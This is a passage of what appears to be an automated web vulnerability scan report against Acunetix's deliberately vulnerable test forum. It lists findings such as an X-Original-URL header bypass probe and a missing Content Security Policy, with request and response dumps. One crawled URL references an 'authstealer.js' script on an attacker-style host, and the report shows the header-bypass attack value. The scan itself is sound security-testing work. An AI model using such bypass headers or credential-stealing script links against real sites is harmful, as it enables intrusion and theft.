</div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | X-Original-URL: /jscripts/tiny_mce |
| Evidence | |
| Request Header - size: 261 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache X-Original-URL: /jscripts/tiny_mce Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=BAKDKBOCCENCKOCMHMAIJMJM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:21:40 GMT Content-Length: 3561 |
| Response Body - size: 3,561 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>117</td><td>117</td><td>3/14/2022 8:20:45 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 4 |
| Solution | |
| Reference |
https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf https://www.contextis.com/en/blog/server-technologies-reverse-proxy-bypass |
| Tags |
OWASP_2021_A01
WSTG-v42-ATHN-04 OWASP_2017_A05 |
| CWE Id | |
| WASC Id | |
| Plugin Id | 40038 |
|
Medium |
Content Security Policy (CSP) Header Not Set |
|---|---|
| Description |
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 205 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 206 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NJGCKBOCAAGEAOFIEAFFCFAM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 327 bytes. |
GET http://testasp.vulnweb.com/avatars/0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 309 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 334 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3198 |
| Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3196 |
| Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3137 |
| Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - 